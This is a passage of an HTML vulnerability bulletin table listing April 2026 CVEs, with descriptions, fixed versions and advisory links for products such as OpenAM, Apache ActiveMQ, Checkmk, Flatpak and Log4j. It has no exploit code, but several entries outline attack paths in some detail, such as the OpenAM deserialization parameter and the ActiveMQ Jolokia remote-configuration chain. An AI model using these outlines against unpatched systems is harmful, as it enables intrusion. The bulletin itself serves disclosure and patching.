    <td>XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Prior to 17.4.8 and 17.10.1, an improperly protected scripting API allows any user with script right to bypass the sandboxing of the Velocity scripting API and execute, e.g., arbitrary Python scripts, allowing full access to the XWiki instance and thereby compromising the confidentiality, integrity and availability of the whole instance. Note that script right already constitutes a high level of access that we don't recommend giving to untrusted users. This vulnerability is fixed in 17.4.8 and 17.10.1.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33229" target="_blank" rel="noopener">CVE-2026-33229</a></td>

    <a href="https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h259-74h5-4rh9" target="_blank" rel="noopener">https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h259-74h5-4rh9</a><br><a href="https://github.com/xwiki/xwiki-platform/commit/9fe84da66184c05953df9466cf3a4acd15a46e63" target="_blank" rel="noopener">https://github.com/xwiki/xwiki-platform/commit/9fe84da66184c05953df9466cf3a4acd15a46e63</a><br><a href="https://jira.xwiki.org/browse/XWIKI-23698" target="_blank" rel="noopener">https://jira.xwiki.org/browse/XWIKI-23698</a><br><a href="https://jira.xwiki.org/browse/XWIKI-23702" target="_blank" rel="noopener">https://jira.xwiki.org/browse/XWIKI-23702</a></td>
    </tr>

    <td class="vendor-product">Apache Software Foundation--Apache OpenMeetings</td>
    <td>Use of Hard-coded Cryptographic Key vulnerability in Apache OpenMeetings. The remember-me cookie encryption key is set to a default value in openmeetings.properties and is not auto-rotated. In case the OM admin hasn't changed the default encryption key, an attacker who has stolen a cookie from a logged-in user can get full user credentials. This issue affects Apache OpenMeetings: from 6.1.0 before 9.0.0. Users are recommended to upgrade to version 9.0.0, which fixes the issue.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33266" target="_blank" rel="noopener">CVE-2026-33266</a></td>

    <a href="https://lists.apache.org/thread/b05jnp9563v49zq494lox9kjbhhf2w66" target="_blank" rel="noopener">https://lists.apache.org/thread/b05jnp9563v49zq494lox9kjbhhf2w66</a></td>
    </tr>

    <td class="vendor-product">ICZ Corporation--MATCHA INVOICE</td>
    <td>Unrestricted upload of file with dangerous type issue exists in MATCHA INVOICE 2.6.6 and earlier. If this vulnerability is exploited, an arbitrary file may be created by an administrator of the product. As a result, arbitrary code may be executed on the server.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33273" target="_blank" rel="noopener">CVE-2026-33273</a></td>

    <a href="https://oss.icz.co.jp/news/?p=1386" target="_blank" rel="noopener">https://oss.icz.co.jp/news/?p=1386</a><br><a href="https://jvn.jp/en/jp/JVN33581068/" target="_blank" rel="noopener">https://jvn.jp/en/jp/JVN33581068/</a></td>
    </tr>

    <td class="vendor-product">OpenIdentityPlatform--OpenAM</td>
    <td>Open Access Management (OpenAM) is an access management solution. Prior to 16.0.6, OpenIdentityPlatform OpenAM is vulnerable to pre-authentication Remote Code Execution (RCE) via unsafe Java deserialization of the jato.clientSession HTTP parameter. This bypasses the WhitelistObjectInputStream mitigation that was applied to the jato.pageSession parameter after CVE-2021-35464. An unauthenticated attacker can achieve arbitrary command execution on the server by sending a crafted serialized Java object as the jato.clientSession GET/POST parameter to any JATO ViewBean endpoint whose JSP contains &lt;jato:form&gt; tags (e.g., the Password Reset pages). This vulnerability is fixed in 16.0.6.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33439" target="_blank" rel="noopener">CVE-2026-33439</a></td>

    <a href="https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj" target="_blank" rel="noopener">https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj</a></td>
    </tr>

    <td class="vendor-product">Checkmk GmbH--Checkmk</td>
    <td>Livestatus injection in the monitoring quicksearch in Checkmk &lt;2.5.0b4 allows an authenticated attacker to inject livestatus commands via the search query due to insufficient input sanitization in search filter plugins.</td>
    <td>2026-04-10</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33455" target="_blank" rel="noopener">CVE-2026-33455</a></td>

    <a href="https://checkmk.com/werk/17988" target="_blank" rel="noopener">https://checkmk.com/werk/17988</a></td>
    </tr>

    <td class="vendor-product">Checkmk GmbH--Checkmk</td>
    <td>Livestatus injection in the notification test mode in Checkmk &lt;2.5.0b4 and &lt;2.4.0p26 allows an authenticated user with access to the notification test page to inject arbitrary Livestatus commands via a crafted service description.</td>
    <td>2026-04-10</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33456" target="_blank" rel="noopener">CVE-2026-33456</a></td>

    <a href="https://checkmk.com/werk/17989" target="_blank" rel="noopener">https://checkmk.com/werk/17989</a></td>
    </tr>

    <td class="vendor-product">Checkmk GmbH--Checkmk</td>
    <td>Livestatus injection in the prediction graph page in Checkmk &lt;2.5.0b4, &lt;2.4.0p26, and &lt;2.3.0p47 allows an authenticated user to inject arbitrary Livestatus commands via a crafted service name parameter due to insufficient sanitization of the service description value.</td>
    <td>2026-04-10</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33457" target="_blank" rel="noopener">CVE-2026-33457</a></td>

    <a href="https://checkmk.com/werk/17990" target="_blank" rel="noopener">https://checkmk.com/werk/17990</a></td>
    </tr>

    <td class="vendor-product">chamilo--chamilo-lms</td>
    <td>Chamilo LMS is a learning management system. Prior to 1.11.38, a chained attack can enable otherwise-blocked PHP code from the main/install/ directory and allow an unauthenticated attacker to modify existing files or create new files where allowed by system permissions. This only affects portals with the main/install/ directory still present and read-accessible. This vulnerability is fixed in 1.11.38.</td>
    <td>2026-04-10</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33698" target="_blank" rel="noopener">CVE-2026-33698</a></td>

    <a href="https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-557g-2w66-gpmf" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-557g-2w66-gpmf</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/d3355d7873c7e5b907c5fa84cbd5d9b62ed33e51" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/d3355d7873c7e5b907c5fa84cbd5d9b62ed33e51</a></td>
    </tr>

    <td class="vendor-product">chamilo--chamilo-lms</td>
    <td>Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the /social-network/personal-data/{userId} endpoint allows any authenticated user to access full personal data and API tokens of arbitrary users by modifying the userId parameter. This results in mass disclosure of sensitive user information and credentials, enabling a full platform data breach. This vulnerability is fixed in 2.0.0-RC.3.</td>
    <td>2026-04-10</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33703" target="_blank" rel="noopener">CVE-2026-33703</a></td>

    <a href="https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-27x6-c5c7-gpf5" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-27x6-c5c7-gpf5</a></td>
    </tr>

    <td class="vendor-product">Go standard library--crypto/x509</td>
    <td>When verifying a certificate chain containing excluded DNS constraints, these constraints are not correctly applied to wildcard DNS SANs which use a different case than the constraint. This only affects validation of otherwise trusted certificate chains, issued by a root CA in the VerifyOptions.Roots CertPool, or in the system certificate pool.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33810" target="_blank" rel="noopener">CVE-2026-33810</a></td>

    <a href="https://go.dev/cl/763763" target="_blank" rel="noopener">https://go.dev/cl/763763</a><br><a href="https://go.dev/issue/78332" target="_blank" rel="noopener">https://go.dev/issue/78332</a><br><a href="https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU" target="_blank" rel="noopener">https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU</a><br><a href="https://pkg.go.dev/vuln/GO-2026-4866" target="_blank" rel="noopener">https://pkg.go.dev/vuln/GO-2026-4866</a></td>
    </tr>

    <td class="vendor-product">github.com/jackc/pgx/v5--github.com/jackc/pgx/v5/pgproto3</td>
    <td>Memory-safety vulnerability in github.com/jackc/pgx/v5.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33815" target="_blank" rel="noopener">CVE-2026-33815</a></td>

    <a href="https://pkg.go.dev/vuln/GO-2026-4771" target="_blank" rel="noopener">https://pkg.go.dev/vuln/GO-2026-4771</a></td>
    </tr>

    <td class="vendor-product">github.com/jackc/pgx/v5--github.com/jackc/pgx/v5/pgproto3</td>
    <td>Memory-safety vulnerability in github.com/jackc/pgx/v5.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33816" target="_blank" rel="noopener">CVE-2026-33816</a></td>

    <a href="https://pkg.go.dev/vuln/GO-2026-4772" target="_blank" rel="noopener">https://pkg.go.dev/vuln/GO-2026-4772</a></td>
    </tr>

    <td class="vendor-product">Mlflow--Mlflow</td>
    <td>MLflow is vulnerable to Stored Cross-Site Scripting (XSS) caused by unsafe parsing of YAML-based MLmodel artifacts in its web interface. An authenticated attacker can upload a malicious MLmodel file containing a payload that executes when another user views the artifact in the UI. This allows actions such as session hijacking or performing operations on behalf of the victim. This issue affects MLflow versions through 3.10.1.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33865" target="_blank" rel="noopener">CVE-2026-33865</a></td>

    <a href="https://github.com/mlflow/mlflow/pull/21435" target="_blank" rel="noopener">https://github.com/mlflow/mlflow/pull/21435</a><br><a href="https://cert.pl/en/posts/2026/04/CVE-2026-33865/" target="_blank" rel="noopener">https://cert.pl/en/posts/2026/04/CVE-2026-33865/</a><br><a href="https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vectors" target="_blank" rel="noopener">https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vectors</a></td>
    </tr>

    <td class="vendor-product">Mlflow--Mlflow</td>
    <td>MLflow is vulnerable to an authorization bypass affecting the AJAX endpoint used to download saved model artifacts. Due to missing access-control validation, a user without permissions to a given experiment can directly query this endpoint and retrieve model artifacts they are not authorized to access. This issue affects MLflow versions through 3.10.1.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33866" target="_blank" rel="noopener">CVE-2026-33866</a></td>

    <a href="https://github.com/mlflow/mlflow/pull/21708" target="_blank" rel="noopener">https://github.com/mlflow/mlflow/pull/21708</a><br><a href="https://cert.pl/en/posts/2026/04/CVE-2026-33865/" target="_blank" rel="noopener">https://cert.pl/en/posts/2026/04/CVE-2026-33865/</a><br><a href="https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vectors" target="_blank" rel="noopener">https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vectors</a></td>
    </tr>

    <td class="vendor-product">Apache Software Foundation--Apache OpenMeetings</td>
    <td>Use of GET Request Method With Sensitive Query Strings vulnerability in Apache OpenMeetings. The REST login endpoint uses the HTTP GET method with username and password passed as query parameters. Please check the references regarding possible impact. This issue affects Apache OpenMeetings: from 3.1.3 before 9.0.0. Users are recommended to upgrade to version 9.0.0, which fixes the issue.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34020" target="_blank" rel="noopener">CVE-2026-34020</a></td>

    <a href="https://owasp.org/www-community/vulnerabilities/Information_exposure_through_query_strings_in_url" target="_blank" rel="noopener">https://owasp.org/www-community/vulnerabilities/Information_exposure_through_query_strings_in_url</a><br><a href="https://lists.apache.org/thread/2h3h9do5tp17xldr0nps1yjmkx4vs3db" target="_blank" rel="noopener">https://lists.apache.org/thread/2h3h9do5tp17xldr0nps1yjmkx4vs3db</a></td>
    </tr>

    <td class="vendor-product">flatpak--flatpak</td>
    <td>Flatpak is a Linux application sandboxing and distribution framework. Prior to 1.16.4, the Flatpak portal accepts paths in the sandbox-expose options which can be app-controlled symlinks pointing at arbitrary paths. Flatpak run mounts the resolved host path in the sandbox. This gives apps access to all host files and can be used as a primitive to gain code execution in the host context. This vulnerability is fixed in 1.16.4.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34078" target="_blank" rel="noopener">CVE-2026-34078</a></td>

    <a href="https://github.com/flatpak/flatpak/security/advisories/GHSA-cc2q-qc34-jprg" target="_blank" rel="noopener">https://github.com/flatpak/flatpak/security/advisories/GHSA-cc2q-qc34-jprg</a></td>
    </tr>

    <td class="vendor-product">flatpak--flatpak</td>
    <td>Flatpak is a Linux application sandboxing and distribution framework. Prior to 1.16.4, the caching for ld.so removes outdated cache files without properly checking that the app-controlled path to the outdated cache is in the cache directory. This allows Flatpak apps to delete arbitrary files on the host. This vulnerability is fixed in 1.16.4.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34079" target="_blank" rel="noopener">CVE-2026-34079</a></td>

    <a href="https://github.com/flatpak/flatpak/security/advisories/GHSA-p29x-r292-46pp" target="_blank" rel="noopener">https://github.com/flatpak/flatpak/security/advisories/GHSA-p29x-r292-46pp</a></td>
    </tr>

    <td class="vendor-product">flatpak--xdg-dbus-proxy</td>
    <td>xdg-dbus-proxy is a filtering proxy for D-Bus connections. Prior to 0.1.7, a policy parser vulnerability allows bypassing eavesdrop restrictions. The proxy checks for eavesdrop=true in policy rules but fails to handle eavesdrop ='true' (with a space before the equals sign) and similar cases. Clients can intercept D-Bus messages they should not have access to. This vulnerability is fixed in 0.1.7.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34080" target="_blank" rel="noopener">CVE-2026-34080</a></td>

    <a href="https://github.com/flatpak/xdg-dbus-proxy/security/advisories/GHSA-vjp5-hjfm-7677" target="_blank" rel="noopener">https://github.com/flatpak/xdg-dbus-proxy/security/advisories/GHSA-vjp5-hjfm-7677</a></td>
    </tr>

    <td class="vendor-product">Hydrosystem--Control System</td>
    <td>Hydrosystem Control System does not enforce authorization for some directories. This allows an unauthorized attacker to read all files in these directories and even execute some of them. Critically, the attacker could run PHP scripts directly on the connected database. This issue was fixed in Hydrosystem Control System version 9.8.5.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34184" target="_blank" rel="noopener">CVE-2026-34184</a></td>

    <a href="https://cert.pl/posts/2026/04/CVE-2026-4901/" target="_blank" rel="noopener">https://cert.pl/posts/2026/04/CVE-2026-4901/</a><br><a href="https://www.hydrosystem.poznan.pl/" target="_blank" rel="noopener">https://www.hydrosystem.poznan.pl/</a><br></td>
    </tr>

    <td class="vendor-product">Hydrosystem--Control System</td>
    <td>Hydrosystem Control System is vulnerable to SQL Injection across most scripts and input parameters. Because no protections are in place, an authenticated attacker can inject arbitrary SQL commands, potentially gaining full control over the database. This issue was fixed in Hydrosystem Control System version 9.8.5.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34185" target="_blank" rel="noopener">CVE-2026-34185</a></td>

    <a href="https://cert.pl/posts/2026/04/CVE-2026-4901/" target="_blank" rel="noopener">https://cert.pl/posts/2026/04/CVE-2026-4901/</a><br><a href="https://www.hydrosystem.poznan.pl/" target="_blank" rel="noopener">https://www.hydrosystem.poznan.pl/</a><br></td>
    </tr>

    <td class="vendor-product">Apache Software Foundation--Apache ActiveMQ Broker</td>
    <td>Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ All: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: before 5.19.4, from 6.0.0 before 6.2.3. Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34197" target="_blank" rel="noopener">CVE-2026-34197</a></td>

    <a href="https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt" target="_blank" rel="noopener">https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt</a><br></td>
    </tr>

    <td class="vendor-product">nyariv--SandboxJS</td>
    <td>SandboxJS is a JavaScript sandboxing library. Prior to 0.8.36, the @nyariv/sandboxjs parser contains unbounded recursion in the restOfExp function and the lispify/lispifyExpr call chain. An attacker can crash any Node.js process that parses untrusted input by supplying deeply nested expressions (e.g., ~2000 nested parentheses), causing a RangeError: Maximum call stack size exceeded that terminates the process. This vulnerability is fixed in 0.8.36.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34211" target="_blank" rel="noopener">CVE-2026-34211</a></td>

    <a href="https://github.com/nyariv/SandboxJS/security/advisories/GHSA-8pfc-jjgw-6g26" target="_blank" rel="noopener">https://github.com/nyariv/SandboxJS/security/advisories/GHSA-8pfc-jjgw-6g26</a><br></td>
    </tr>

    <td class="vendor-product">nyariv--SandboxJS</td>
    <td>SandboxJS is a JavaScript sandboxing library. Prior to 0.8.36, a scope modification vulnerability exists in @nyariv/sandboxjs. The vulnerability allows untrusted sandboxed code to leak internal interpreter objects through the new operator, exposing sandbox scope objects in the scope hierarchy to untrusted code; an unexpected and undesired exploit. While this could allow modifying scopes inside the sandbox, code evaluation remains sandboxed and prototypes remain protected throughout the execution. This vulnerability is fixed in 0.8.36.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34217" target="_blank" rel="noopener">CVE-2026-34217</a></td>

    <a href="https://github.com/nyariv/SandboxJS/security/advisories/GHSA-hg73-4w7g-q96w" target="_blank" rel="noopener">https://github.com/nyariv/SandboxJS/security/advisories/GHSA-hg73-4w7g-q96w</a><br></td>
    </tr>

    <td class="vendor-product">zammad--zammad</td>
    <td>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1, customers in shared organizations (meaning they can see each other's tickets) could see fields which are not intended for customers, including fields not intended for them at all (e.g. priority, custom ticket attributes for internal purposes). This was the case when a customer opened a ticket from another user of the same shared organization. They are not able to modify these fields. This vulnerability is fixed in 7.0.1.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34248" target="_blank" rel="noopener">CVE-2026-34248</a></td>

    <a href="https://github.com/zammad/zammad/security/advisories/GHSA-prww-84vh-w978" target="_blank" rel="noopener">https://github.com/zammad/zammad/security/advisories/GHSA-prww-84vh-w978</a><br></td>
    </tr>

    <td class="vendor-product">Sonatype--Nexus Repository</td>
    <td>A reflected cross-site scripting vulnerability exists in Sonatype Nexus Repository versions 3.0.0 through 3.90.2 that allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser through a specially crafted URL. Exploitation requires user interaction.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-3438" target="_blank" rel="noopener">CVE-2026-3438</a></td>

    <a href="https://help.sonatype.com/en/sonatype-nexus-repository-3-91-0-release-notes.html" target="_blank" rel="noopener">https://help.sonatype.com/en/sonatype-nexus-repository-3-91-0-release-notes.html</a><br><a href="https://support.sonatype.com/hc/en-us/articles/50609137161363" target="_blank" rel="noopener">https://support.sonatype.com/hc/en-us/articles/50609137161363</a><br></td>
    </tr>

    <td class="vendor-product">scoder--lupa</td>
    <td>Lupa integrates the runtimes of Lua or LuaJIT2 into CPython. In 2.6 and earlier, attribute_filter is not consistently applied when attributes are accessed through built-in functions like getattr and setattr. This allows an attacker to bypass the intended restrictions and eventually achieve arbitrary code execution.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34444" target="_blank" rel="noopener">CVE-2026-34444</a></td>

    <a href="https://github.com/scoder/lupa/security/advisories/GHSA-69v7-xpr6-6gjm" target="_blank" rel="noopener">https://github.com/scoder/lupa/security/advisories/GHSA-69v7-xpr6-6gjm</a><br></td>
    </tr>

    <td class="vendor-product">Python Software Foundation--CPython</td>
    <td>When calling base64.b64decode() or related functions the decoding process would stop after encountering the first padded quad regardless of whether there was more information to be processed. This can lead to data being accepted which may be processed differently by other implementations. Use "validate=True" to enable stricter processing of base64 data.</td>
    <td>2026-04-10</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-3446" target="_blank" rel="noopener">CVE-2026-3446</a></td>

    <a href="https://github.com/python/cpython/pull/145267" target="_blank" rel="noopener">https://github.com/python/cpython/pull/145267</a><br><a href="https://github.com/python/cpython/issues/145264" target="_blank" rel="noopener">https://github.com/python/cpython/issues/145264</a><br><a href="https://mail.python.org/archives/list/security-announce@python.org/thread/F5ZT5ICGJ6CKXVUJ34YBVY7WOZ5SHG53/" target="_blank" rel="noopener">https://mail.python.org/archives/list/security-announce@python.org/thread/F5ZT5ICGJ6CKXVUJ34YBVY7WOZ5SHG53/</a><br><a href="https://github.com/python/cpython/commit/1f9958f909c1b41a4ffc0b613ef8ec8fa5e7c474" target="_blank" rel="noopener">https://github.com/python/cpython/commit/1f9958f909c1b41a4ffc0b613ef8ec8fa5e7c474</a><br><a href="https://github.com/python/cpython/commit/4561f6418a691b3e89aef0901f53fe0dfb7f7c0e" target="_blank" rel="noopener">https://github.com/python/cpython/commit/4561f6418a691b3e89aef0901f53fe0dfb7f7c0e</a><br><a href="https://github.com/python/cpython/commit/e31c55121620189a0d1a07b689762d8ca9c1b7fa" target="_blank" rel="noopener">https://github.com/python/cpython/commit/e31c55121620189a0d1a07b689762d8ca9c1b7fa</a><br></td>
    </tr>

    <td class="vendor-product">Apache Software Foundation--Apache Log4j Core</td>
    <td>The fix for CVE-2025-68161 https://logging.apache.org/security.html#CVE-2025-68161 was incomplete: it addressed hostname verification only when enabled via the log4j2.sslVerifyHostName https://logging.apache.org/log4j/2.x/manual/systemproperties.html#log4j2.sslVerifyHostName system property, but not when configured through the verifyHostName https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName attribute of the &lt;Ssl&gt; element. Although the verifyHostName configuration attribute was introduced in Log4j Core 2.12.0, it was silently ignored in all versions through 2.25.3, leaving TLS connections vulnerable to interception regardless of the configured value. A network-based attacker may be able to perform a man-in-the-middle attack when all of the following conditions are met: * An SMTP, Socket, or Syslog appender is in use. * TLS is configured via a nested &lt;Ssl&gt; element. * The attacker can present a certificate issued by a CA trusted by the appender's configured trust store, or by the default Java trust store if none is configured. This issue does not affect users of the HTTP appender, which uses a separate verifyHostname https://logging.apache.org/log4j/2.x/manual/appenders/network.html#HttpAppender-attr-verifyHostName attribute that was not subject to this bug and verifies host names by default. Users are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue.</td>
    <td>2026-04-10</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34477" target="_blank" rel="noopener">CVE-2026-34477</a></td>

    <a href="https://github.com/apache/logging-log4j2/pull/4075" target="_blank" rel="noopener">https://github.com/apache/logging-log4j2/pull/4075</a><br><a href="https://logging.apache.org/security.html#CVE-2026-34477" target="_blank" rel="noopener">https://logging.apache.org/security.html#CVE-2026-34477</a><br><a href="https://logging.apache.org/cyclonedx/vdr.xml" target="_blank" rel="noopener">https://logging.apache.org/cyclonedx/vdr.xml</a><br><a href="https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName" target="_blank" rel="noopener">https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName</a><br><a href="https://lists.apache.org/thread/lkx8cl46t2bvkcwfcb2pd43ygc097lq4" target="_blank" rel="noopener">https://lists.apache.org/thread/lkx8cl46t2bvkcwfcb2pd43ygc097lq4</a><br></td>
    </tr>

    <td class="vendor-product">Apache Software Foundation--Apache Log4j Core</td>
    <td>Apache Log4j Core's Rfc5424Layout https://logging.apache.org/log4j/2.x/manual/layouts.html#RFC5424Layout , in versions 2.21.0 through 2.25.3, is vulnerable to log injection via CRLF sequences due to undocumented renames of security-relevant configuration attributes. Two distinct issues affect users of stream-based syslog services who configure Rfc5424Layout directly: * The newLineEscape attribute was silently renamed, causing newline escaping to stop working for users of TCP framing (RFC 6587), exposing them to CRLF injection in log output. * The useTlsMessageFormat attribute was silently renamed, causing users of TLS framing (RFC 5425) to be silently downgraded to unframed TCP (RFC 6587), without newline escaping. Users of the SyslogAppender are not affected, as its configuration attributes were not modified. Users are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue.</td>
    <td>2026-04-10</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34478" target="_blank" rel="noopener">CVE-2026-34478</a></td>

    <a href="https://github.com/apache/logging-log4j2/pull/4074" target="_blank" rel="noopener">https://github.com/apache/logging-log4j2/pull/4074</a><br><a href="https://logging.apache.org/security.html#CVE-2026-34478" target="_blank" rel="noopener">https://logging.apache.org/security.html#CVE-2026-34478</a><br><a href="https://logging.apache.org/cyclonedx/vdr.xml" target="_blank" rel="noopener">https://logging.apache.org/cyclonedx/vdr.xml</a><br><a href="https://logging.apache.org/log4j/2.x/manual/layouts.html#RFC5424Layout" target="_blank" rel="noopener">https://logging.apache.org/log4j/2.x/manual/layouts.html#RFC5424Layout</a><br><a href="https://lists.apache.org/thread/3k1clr2l6vkdnl4cbhjrnt1nyjvb5gwt" target="_blank" rel="noopener">https://lists.apache.org/thread/3k1clr2l6vkdnl4cbhjrnt1nyjvb5gwt</a><br></td>
    </tr>

    <td class="vendor-product">Apache Software Foundation--Apache Log4j 1 to Log4j 2 bridge</td>
    <td>The Log4j1XmlLayout from the Apache Log4j 1-to-Log4j 2 bridge fails to escape characters forbidden by the XML 1.0 standard, producing malformed XML output. Conforming XML parsers are required to reject documents containing such characters with a fatal error, which may cause downstream log processing systems to drop or fail to index affected records. Two groups of users are affected: * Those using Log4j1XmlLayout directly in a Log4j Core 2 configuration file. * Those using the Log4j 1 configuration compatibility layer with org.apache.log4j.xml.XMLLayout specified as the layout class. Users are advised to upgrade to Apache Log4j 1-to-Log4j 2 bridge version 2.25.4, which corrects this issue. Note: The Apache Log4j 1-to-Log4j 2 bridge is deprecated and will not be present in Log4j 3. Users are encouraged to consult the Log4j 1 to Log4j 2 migration guide https://logging.apache.org/log4j/2.x/migrate-from-log4j1.html , and specifically the section on eliminating reliance on the bridge.</td>
    <td>2026-04-10</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34479" target="_blank" rel="noopener">CVE-2026-34479</a></td>

    <a href="https://github.com/apache/logging-log4j2/pull/4078" target="_blank" rel="noopener">https://github.com/apache/logging-log4j2/pull/4078</a><br><a href="https://logging.apache.org/security.html#CVE-2026-34479" target="_blank" rel="noopener">https://logging.apache.org/security.html#CVE-2026-34479</a><br><a href="https://logging.apache.org/cyclonedx/vdr.xml" target="_blank" rel="noopener">https://logging.apache.org/cyclonedx/vdr.xml</a><br><a href="https://logging.apache.org/log4j/2.x/migrate-from-log4j1.html" target="_blank" rel="noopener">https://logging.apache.org/log4j/2.x/migrate-from-log4j1.html</a><br><a href="https://lists.apache.org/thread/gd0hp6mj17rn3kj279vgy4p7kd4zz5on" target="_blank" rel="noopener">https://lists.apache.org/thread/gd0hp6mj17rn3kj279vgy4p7kd4zz5on</a><br></td>
    </tr>

    <td class="vendor-product">Apache Software Foundation--Apache Log4j Core</td>
    <td>Apache Log4j Core's XmlLayout https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout , in versions up to and including 2.25.3, fails to sanitize characters forbidden by the XML 1.0 specification https://www.w3.org/TR/xml/#charsets producing invalid XML output whenever a log message or MDC value contains such characters. The impact depends on the StAX implementation in use: * JRE built-in StAX: Forbidden characters are silently written to the output, producing malformed XML. Conforming parsers must reject such documents with a fatal error, which may cause downstream log-processing systems to drop the affected records. * Alternative StAX implementations (e.g., Woodstox https://github.com/FasterXML/woodstox , a transitive dependency of the Jackson XML Dataformat module): An exception is thrown during the logging call, and the log event is never delivered to its intended appender, only to Log4j's internal status logger. Users are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue by sanitizing forbidden characters before XML output.</td>
    <td>2026-04-10</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34480" target="_blank" rel="noopener">CVE-2026-34480</a></td>

